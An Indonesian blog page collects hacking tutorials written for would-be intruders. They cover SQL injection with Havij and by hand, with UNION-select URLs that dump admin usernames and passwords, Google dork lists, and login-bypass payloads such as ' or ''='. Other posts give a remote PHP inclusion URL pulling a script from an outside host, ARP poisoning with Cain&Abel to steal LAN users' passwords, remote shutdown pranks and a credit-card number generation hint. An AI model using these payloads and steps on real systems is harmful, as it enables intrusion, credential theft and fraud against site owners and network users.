Visual identity

If you want promote your business, then you have come to the right place. more »

Unique solutions

If you want promote your business, then you have come to the right place. more »

Live support

If you want promote your business, then you have come to the right place. more »

Hacking web Menggunakan Tools Havij

Diposting oleh blog TKJ

Hacking web Menggunakan Tools Havij



Langkah pertama, cari dulu website yang akan dijadikan target. Buka google,
ketik misalkan : inurl:index.php?id=

Setelah kita dapat web target, cek menggunakan tanda petik – '
Testing :
http://www.target.com.my/index.phpid='1
http://www.target.com.my/index.php?id=-1

Website ternyata error, klo seperti itu berarti website vuln. Ok qta lanjutkan ke tahap selanjut’y. Buka Tools havij copas url web yg tadi sudah kita cek.

http://i56.tinypic.com/bfiezq.jpg

1. Setelah di copas URL’y lalu Klik icon Analyze. Tunggu sampai selesai. (Biarkan sampai status kembali I’m IDLE)
Kalo dagh selesai nanti tampilan’y akan seperti ini :

http://i56.tinypic.com/25jcyzc.jpg

2. Selanjut’y Klik icon Tables, tampilan’y seperti ini :

http://i52.tinypic.com/n5su9v.jpg

3. lanjutkan dengan mengKlik Get DBs Screenshoot seperti di bawah ini :

http://i53.tinypic.com/2ikcw38.jpg

OK guys...udah keliatan tuwh nama2 dari database’y, tgl dipilih target yg ingin qta perkosa. Qta perkosa Database yg bernama Administrator aja. :D

4. Klik DB Administrator lalu klik Get Tables, nanti akan keluar tables2’y seperti ini :

http://i53.tinypic.com/2rgdwgi.jpg

5. Next sekarang qta cari columns’y. Cara’y klik hasil yg keluar tadi beberapa columns yg keluar dari tables Administrator seperti ini : isdeleted,tingkat,password,user_name,id
Qta centang user_name and password’y saja lalu klik Get Data.
Ok guys selesai akhir’y password and user_name Admin dah nongol tuwh.

http://i55.tinypic.com/icvc5j.jpg

Tools ini memang cukup banyak fungsi’y, selain sql injection secara otomatic. Tools ini mempunyai banyak fitur lain’y antara lain untuk mencari halaman admin ato mencari password hash MD5.

http://i53.tinypic.com/2lj6npf.jpg

Cukup sampe sini aja yak, klo untuk mencari halaman admin’y ato MD5 silahkan di otak-atik sendiri aja. Cara’y mudah kok.

Download Tools Havij : http://www.soon2be1.com/Havij 1.10.rar

Thank’z to my Family’s devilzc0de

more »

Rahasia Sebuah Nomor Kartu Kredit

Diposting oleh blog TKJ



Pemberitahuan: Kami tidak mengajarkan pembaca untuk bermian main dengan nomor kartu kredit, tapi kami hanya mengajarkan konsep dasar bagaimana perhitungan didalam sebuah nomor kartu kredit - CEO Radicaltech -



Pernahkan Anda memiliki keinginan untuk membuat script untuk mengecek valid tidaknya nomor dari sebuah kartu kredit ? Tulisan dibawah ini akan menjelaskan hal tersebut agar Anda bisa membuat script untuk pengecekan nomor kartu kredit sendiri.
Pada dasarnya semua nomor kartu kredit menggunakan algoritma cek digit, yaitu sebuah algoritma yang digunakan untuk mengecek validitas suatu angka berdasarkan digit-digit yang membentuknya. Algoritma yang dipergunakan untuk seluruh nomor kartu kredit adalah algoritma cek digit Luhn. Entah bagiamana sejarahnya, yang jelas algoritma cek digit Luhn adalah algoritma cek digit yang saat ini digunakan oleh seluruh bank besar di dunia yang mengeluarkan kartu kredit.
Perlu tiga langkah untuk membuktikan apakah suatu kartu memenuhi algoritma cek digit Luhn, langkah-langkah tersebut adalah sebagai berikut :
  1. Kalikan dua setiap nilai untuk setiap digit yang letaknya pada posisi ganjil, jika hasilnya lebih dari 9, kurangi hasilnya dengan 9. Setelah itu jumlahkan semua angka yang telah didapat itu.
  2. Jumlahkan semua nilai untuk setiap digit yang letaknya pada posisi genap.
  3. Jika hasil penjumlahan langkah pertama dan kedua adalah sebuah bilangan yang habis dibagi 10, berarti nomor kartu tersebut valid.
Umumnya kartu kredit memiliki jumlah digit sebanyak 16, tetapi ada juga kartu kredit yang memiliki jumlah digit yang ganjil, misalnya 13 atau 15 digit. Untuk kartu-kartu kredit yang memiliki jumlah digit ganjil, langkah pertama yang dikalikan adalah digit yang terletak pada posisi genap, dan langkah kedua yang dijumlahkan adalah digit pada posisi ganjil.


Contoh :
Nomor kartu kredit : 1800-2020-3047-8690
Apakah kartu kredit ini valid ? Cara pengecekannya adalah sebagai berikut :
  1. Langkah pertama, (1x2)+(0x2)+(2x2)+(2x2)+(3x2)+(4x2)+(8x2-9)+(9x2-9)=39
  2. Langkah kedua, 8+0+0+0+0+7+6+0=21
  3. Langkah ketiga, 39+21=60. Bilangan 60 adalah bilangan yang habis dibagi 10, maka bisa dipastikan nomor kartu kredit tersebut valid.
Contoh :
Jika saya punya kartu dengan nomor :

7889-8594-5435-5413 

dan saya ingin tahu apakah angka ini benar-benar nomor kartu kredit yang sah atau tidak saya bisa melakukan langkah sbb (perhatikan jumlah digit ada 16):

1) mengalikan semua angka pada digit ganjil dengan dua dan mengurangkan hasilnya dengan 9 jika lebih dari 9, lalu dijumlahkan

inilah digit-digit pada posisi ganjil

D01 = 7
D03 = 8
D05 = 8
D07 = 9
D09 = 5
D11 = 3
D13 = 5
D15 = 1

Jika dilakukan operasi kali dua dan kurangi 9 (jika lebih dari 9) didapat

D01' = 7 x 2 = 14, karena lebih dari maka hasilnya dikurangi 9 D02' = 14 - 9 = 5
D03' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D05' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D07' = 9 x 2 = 18, karena lebih dari maka hasilnya dikurangi 9 D02' = 18 - 9 = 9
D09' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D11' = 3 x 2 = 6 , kurang dari 9 jadi tetap 6
D13' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D15' = 1 x 2 = 2 , kurang dari 9 jadi tetap 2

Jumlah D01' + D03' + D05' + D07' + D09' + D11' + D13' + D15' = 5 + 7 + 7 + 9 + 1 + 6 + 1 + 2 = 38

2) Menjumlahkan semua digit pada posisi genap

D02 = 8
D04 = 9
D06 = 5
D08 = 4
D10 = 4
D12 = 5
D14 = 4
D16 = 3

Jumlah = 8 + 9 + 5 + 4 + 4 + 5 + 4 + 3 = 42

Bila hasil langkah 1 dan langkah 2 dijumlahkan didapat 38 + 42 = 80, karena 80 habis dibagi 10 maka nomor tersebut sah sebagai nomor kartu kredit.

Sudah jelas kan?, ternyata algoritma cek digit pada kartu kredit sangat mudah dilakukan Anda pun bisa menghasilkan nomor-nomor yang sah sebagai nomor kartu kredit dengan menggunakan program, dan katanya dulu ini bisa dipakai untuk melakukan credit card fraud saya sendiri masih kurang mengerti dengan caranya karena menurut saya sekarang ini pemeriksaan sudah jauh lebih ketat dan hampir tidak mungkin seseorang lolos dengan hanya berbekal nomor yang sah saja tanpa expiration date dan nama pemiliknya.

Untuk penambahan jika Anda membuat script validasi nomor kartu kredit, tabel dibawah ini bisa disertakan untuk mengecek apakah kartu tersebut sesuai dengan bank yang mengeluarkannya (jenisnya).

Prefiks
Jumlah Digit
Jenis Kartu
300
14
Diners
301
14
Diners
302
14
Diners
303
14
Diners
304
14
Diners
305
14
Diners
34
15
Amex
36
14
Diners
37
15
Amex
38
14
Diners
4
13
Visa
4
16
Visa
51
16
Mastercard
52
16
Mastercard
53
16
Mastercard
54
16
Mastercard
55
16
Mastercard


more »

Curangi Bandwidth Client warnet

Diposting oleh blog TKJ


Sebenernya cara ini adalah cara yang digunakan untuk mempercepat kecepatan ineternet kita pada windows XP.
Inti nya adalah windows XP tersetting secara default akan mengambil 20% dari kecepatan akses internet kita yang 100%.
Sebenar nya, ada beberapa software juga yang dapat kita gunakan untuk membatasi pemakaian bandwidth pada tiap komputer client, tapi cara ini belum dapat menjamin 100% bandwidth komputer client di warnet terbagi secara adil.
Nah, cara yang akan saya gunakan adalah dengan cara mensetting % penggunaan bandwidth client yang di setting melalui windows itu sendiri.
Cara nya adalah sebagai berikut:
1. Klik start ==> run
2. Lalu ketik gpedit.msc, Kemudian setelah itu keluar kotak “Group Policy”
3. Di “ Computer Configuration “, Pilih “Administrative Templates“
4. Lalu pilih “ Network “
5. Klik pada “QoS Packet Scheduler “
6. Setelah itu Pilih Pada “ Limit reservable Bandwidth “
7. Pilih dari “ Not Configured “ menjadi “ Enable “
8. Setelah itu Pada tabel bawah pada tulisan “ Bandwidth Limit % “ Ubah Dari “20” Menjadi “80 atau 20”, Lalu “Apply” , “ OK “. setting ini tergantung dari jumlah komputer, jika kita mau setting setiap komputer dapet bandwith 10% maka kita tinggal masukan angka 90%, bila setiap komputer ingin kita set dapat 20% maka tinggal kita masukan angka 80%.
semoga membantu.
Tambahan dari komentator:
all ane mu share sdkt pengetahuan yg real stlh sy dpt n coba sndiri (100% good work)
untuk membagi bandwitch dr para download maniak yg super2 hobi biar gak pd ribut sy dah test sndiri lgsg.info di thead ini jg w anjurin d’pke jg,nah bwt membagi yg lg ngdonlot pke idm (pst dah pd tw kn ne software manteup bwt donlot) nah abz di instal + d’setting pke cr di thread ini,setting pula speed limiter di idm dgn cr yg sgt mudh!! :request
1. bk idm
2. pilih menu download
3. pilih speed limiter
4. setting
5. masukan kuota di inputan maximum download speed for one file [....] kbytes/sec
6. ok
7. ulangi langkah dari no. 2 – no. 3
8. pilih turn on
9. selesai

:pertamax
sample :
klo pc client pny 4 + 1 server ‘n bandwitch speedy 2mb, inputan kuota speed limitnya isi 75 kbtes/sec di masing2 idm pc client, tergantung operator msg2 warnet,krn pembagian speed ini bkn persentase’a,tp pembagian real bandwitch’a.untk lbh jls’a bs coba sndiri lgsg pst kalian smua bkl paham.
skian share dr w. :travel

slm hgt sobat dunia IT Indonesia , by Chiko Zip.




Tag:cara membagi bandwith, cara membagi bandwidth speedy, cara membagi bandwidth, membagi bandwidth, cara membagi bandwith warnet, membagi bandwidth speedy, membagi bandwith warnet
more »

cara membuka file zip,rar,7zip yang terproteksi password

Diposting oleh blog TKJ
Pernakah kamu mendownload file besar, seperti contohnya game berexstensi rar dan ternyata disitu meminta untuk memasukan password ? pasti jengkel sekali !!

tenang saja password tersebut bisa kita buka.
dengan aplikasi RarCrack kita bisa mebobolnya / membukanya.

Biasanya di internet memang ditawarkan download software pembuka zip,rar,7Zip yang terkunci, namun kita wajib mengeluarkan biaya, paling tidak mereka hanya menawarkan program trial yang ada expire datenya. Tetapi jika kamu adalah pengguna Linux (kalau kamu tidak punya Linux, silahkan file tersebut bawa kepada teman kamu yang mempunyai OS Linux dan ekstrak di komputernya, kemudian transfer file-file tersebut ke USB dan bawa pulang.


RarCrack adalah solusi yang bagus sebagai cara membuka file zip,rar,7zip yang terproteksi password.

Utility kecil yang bernama RarCrack dijalankan dengan command line.
silahkan didownload disini atau http://sourceforge.net/projects/rarcrack/ secara gratis atau freeware. Dengan metode brute-force algoritma, RarCrack dapat dengan cerdas membongkar sandi rahasia file rar, atau zip yang terkunci.

Cara menggunakannya :
RarCracknya dijalan terlebih dahulu.. Kemudian Drag (pindahkan)File Zip, Rar, 7Zip yang di pasword ke dalam RarCrack..
selesai . . .


@ingat
aplikasi ini hanya dapat bekerja di linux saja.

more »

ShutDown Komputer Orang di LAN (Warnet)

Diposting oleh blog TKJ





trik mematikan komputer orang lain di warnethaloo temen2 ..
maaf nii baru update hahaha gara2 bingung nyari koneksi murah wkwkw :p

kali ini pedasmaniscinta mau bagi tips luamaa banget hahaha
otak - atik bengkel komputer di warnet :D
nahh tips ini mungkin banyak dicari buat yang suka usil ngerjain temen hahaah. lewat jaringan LAN (Local Area Network) temen2 bisa shutdown paksa komputer target temen2 yang pengen kita kerjain.

okeee deh langsung aja yaaa
cappp cusssssssss cinn :))

Caranya:
1. Pada komputer, klik Start -> Run, di kotak isian tersebut temen2 isikan "cmd" (tanpa tanda petik )

2. Setelah itu muncul kotak berwarna hitam, di situ temen2 ketikan SHUTDOWN.EXE (spasi) -i (spasi) -m
Contoh: Shutdown.exe -i -m lalu kamu tekan Enter



4. Maka akan muncul kotak di samping yang bernama "Remote Shutdown Dialog"




5. Temen2 klik "ADD" -> untuk menambahkan IP target or nama target di LAN, atau temen klik "Browse" untuk mencari otomatis

6. Temen2 bisa tentuin yang enaknya buat ngusilin komputer orang itu, apakah di shutdown, restart, or Log off.

7. Tentukan time yang pas buat deat time-nya komputer itu beraksi ;)

8. Temen2 bisa tambakan other (planned), ini dimaksudkan agar si user lawan mengira kalo ini ulah server yang lagi maintenance

9. Kirim kan pesan terakhirmu ke komputer orang di COMMENT Contoh :
Contoh:
Hai boleh kenalan ngga? wkwkwwk :p

10. Tertawalah yang puas melihat orang lain kebingungan..hahahahahahahahaha


Tips dari saya:

Ini paling penting bwt temen2 inget...sebab dalam hal ini, IP temen2 or id/nama pengguna warnet bakal terlihat di comment terakhir...karena dari sana terdapat IP addres temen2 yg gunakan.

-> firewall harus dimatikan,jika tidak, cara ini tidak berhasil < -
more »

Cara Mudah Hacking di LAN (Local Area Network)

Diposting oleh blog TKJ
Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya


Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html


Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

  1. * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
    * Buka program Cain anda
    * Klik pada bagian configure
    * Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
    * Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
    Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
    * Setelah itu apply settingannya dan klik ok
    * Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
    * Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
    * Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
    * Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
    * Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
    * Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
    * Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
    * Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
    * Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
    * Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).
more »

Cara Mencari Login Admin di website dengan tool Reiluke

Diposting oleh blog TKJ
Mohon maaf.

untuk para defacer pemula terkadang sangat kesulitan untuk mencari halaman login admin setelah mendapatkan semua user name dan passwordnya.

tapi ada salah satu tool yang masih HOT untuk dicoba.
hehehehe

sebut saja Reiluke - Admin Login Finder
tool untuk mencari halaman login sebuah website. dari tool ini akan menampilkan halaman login dalam list yang terdeteksi dengan metode Brute Force.

tampilan seperti berikut.




klik di link bawah ini:

download - Admin Login Finder

Mirror.

download - Admin Login Finder Reiluke


cara menggunakannya, mudah :
  1. cukup masukan link websitenya.
  2. lalu tekan/klik scan

Semoga bermanfaat !!
more »

Hacking Website dengan tekhnik SQL Injection

Diposting oleh blog TKJ

 



hacking web atau biasa disbut web attack sangat banyak caranya,salahsatunya dengan cara sql injection
apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.


oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...



---------------------------------------------------

begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
belajarlah terus

more »

DORK SQL INJECTION WEB ATTACK

Diposting oleh blog TKJ
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
“root/login.asp”
“admin/index.asp”

login With :
Community ID:´or´´=´
Password:´or´´=´

Bugs File : admin page --> /admin

Display : http://target.com/s-cart/admin


1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"

2. Get the target site like --> http://www.target.com/s-cart/index.phtml

3. and now go to admin page with change the Url to :

http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!

login : admin
passwd : ´or´´=´


4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
Ok let´s to try :P~

secure php

how to secure php

1. open php.ini (find your selt were is the place)
2. find part safe_mode (default valiu is off), turn to =on
3. log off the danger fungsion like passthru, system. exec.
with fungsion name to the disable_function=
4. teh easy way n more secure --> use normal html ,not php :)
5. wacth out permission direktori and file,

note
this fungsion is better be off:

1. passthru, system, exec, myshellexec <-- php command shell
2. fopen <-- can executed remote file
3. fwrite, fputs <-- to write file
4. phpinfo <-- data with php

Hacking konsep :

http://[VICTIM]/mail_autocheck.php?pm_path=http://www.webloe.com/phpinjection.txt?&cmd=id

web target you can find in the search engine like google.
sample we can use keyword inurl atau allinurl:

allinurl:/mail_autocheck.php?pm_path=*.*

sample script php injection you can upload to your website

------------------END HERE---------------------------

##############################################
My_eGallery security exploit

Author : scariot shall live for ever
##############################################

Bugs File may be : displayCategory.php

Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php


Note :

for attacking u must use this script, save and upload to your website.
e.g save with namefile : cmd.txt
e.g from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt
more »

TUTORIAL SQL INJECTION

Diposting oleh blog TKJ
TUTORIAL SQL INJECTION

Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.


Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection


Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :


Berubah menjadi :




Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :


Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :


Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
